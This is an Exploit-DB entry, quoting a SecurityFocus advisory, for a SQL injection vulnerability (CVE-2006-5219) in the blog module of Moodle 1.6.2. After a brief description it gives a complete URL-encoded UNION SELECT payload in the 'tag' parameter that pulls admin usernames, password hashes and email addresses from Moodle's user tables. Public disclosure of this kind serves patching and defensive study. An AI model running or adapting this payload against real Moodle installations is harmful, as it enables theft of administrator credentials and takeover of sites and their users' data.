Moodle Blog 1.18.2.2/1.6.2 Module SQL Injection Vulnerability

2006-10-08T00:00:00
ID EDB-ID:28770
Type exploitdb
Reporter disfigure
Modified 2006-10-08T00:00:00

Description

Moodle Blog 1.18.2.2/1.6.2 Module SQL Injection Vulnerability. CVE-2006-5219 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20395/info

Moodle is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Moodle 1.6.2 is reported vulnerable; prior versions may also be affected.

http://www.example.com/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20
FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20F
ROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271